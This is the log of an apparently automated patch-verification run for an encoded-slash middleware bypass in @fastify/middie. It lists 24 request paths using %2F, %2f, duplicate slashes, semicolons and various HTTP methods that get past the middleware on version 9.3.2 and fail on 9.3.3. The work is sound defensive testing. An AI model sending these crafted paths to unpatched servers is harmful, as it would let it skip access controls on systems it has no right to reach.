================================================================ CVE-2026-14198 variant/bypass analysis: @fastify/middie encoded-slash bypass run: Thu Jul 2 17:45:35 UTC 2026 ROOT=/data/pruva/runs/1097abc6-d12b-4882-a698-de4bec5dc5c5/bundle ================================================================ [workspace] using project cache: vuln=/data/pruva/project-cache/b133492c-81d6-4c5b-afbf-03b28ec1f618/repo-vuln-v932 fixed=/data/pruva/project-cache/b133492c-81d6-4c5b-afbf-03b28ec1f618/repo [versions] vulnerable @fastify/middie=9.3.2 fixed @fastify/middie=9.3.3 [source] fixed HEAD=e038188b33b9436e1be9f9d1c1920416ec6c18f1 vuln HEAD=792d2f46ae68516d3122c9a4468a5748a34efb47 ---- consolidated probe: vulnerable ---- } ] } ---- consolidated probe: fixed ---- } ] } ================================================================ BYPASS COUNTS vulnerable (9.3.2): 24 bypass(es) fixed (9.3.3): 0 bypass(es) ================================================================ --- vulnerable build bypass hits --- standard|control_original_%2F|GET|/user/a%2Fb/comments noKey=200/withKey=200 standard|lowercase_%2f|GET|/user/a%2fb/comments noKey=200/withKey=200 standard|param_is_only_%2F|GET|/user/%2F/comments noKey=200/withKey=200 standard|two_single_%2F_in_param|GET|/user/a%2Fb%2Fc/comments noKey=200/withKey=200 standard|mixed_case_%2F_%2f|GET|/user/a%2Fb%2fc/comments noKey=200/withKey=200 standard|with_query|GET|/user/a%2Fb/comments?x=1 noKey=200/withKey=200 standard|semicolon_after_param|GET|/user/a%2Fb;x/comments noKey=200/withKey=200 opts:trailing|ignoreTrailing_%2F|GET|/user/a%2Fb/comments/ noKey=200/withKey=200 opts:trailing|semi_%2F|GET|/user/a%2Fb;x/comments noKey=200/withKey=200 opts:dupslash|ignoreDup_%2F|GET|//user/a%2Fb/comments noKey=200/withKey=200 opts:dupslash|semi_%2F|GET|/user/a%2Fb;x/comments noKey=200/withKey=200 opts:trailing+dup|ignoreTrailing_%2F|GET|/user/a%2Fb/comments/ noKey=200/withKey=200 opts:trailing+dup|ignoreDup_%2F|GET|//user/a%2Fb/comments noKey=200/withKey=200 opts:trailing+dup|semi_%2F|GET|/user/a%2Fb;x/comments noKey=200/withKey=200 opts:all|ignoreTrailing_%2F|GET|/user/a%2Fb/comments/ noKey=200/withKey=200 opts:all|ignoreDup_%2F|GET|//user/a%2Fb/comments noKey=200/withKey=200 methods|method_bypass_%2F|GET|/user/a%2Fb/comments noKey=200/withKey=200 methods|method_bypass_%2F|POST|/user/a%2Fb/comments noKey=200/withKey=200 methods|method_bypass_%2F|PUT|/user/a%2Fb/comments noKey=200/withKey=200 methods|method_bypass_%2F|PATCH|/user/a%2Fb/comments noKey=200/withKey=200 methods|method_bypass_%2F|DELETE|/user/a%2Fb/comments noKey=200/withKey=200 methods|method_bypass_%2F|HEAD|/user/a%2Fb/comments noKey=200/withKey=200 prefix|prefix_%2F|GET|/api/user/a%2Fb/comments noKey=200/withKey=200 prefix|prefix_%2f_lower|GET|/api/user/a%2fb/comments noKey=200/withKey=200 [control] original %2F bypass: vulnerable=true fixed=false runtime_manifest written: /data/pruva/runs/1097abc6-d12b-4882-a698-de4bec5dc5c5/bundle/vuln_variant/runtime_manifest.json VERDICT: NO VARIANT/BYPASS on fixed build (exit 1). Vulnerable control bypass=true (harness valid).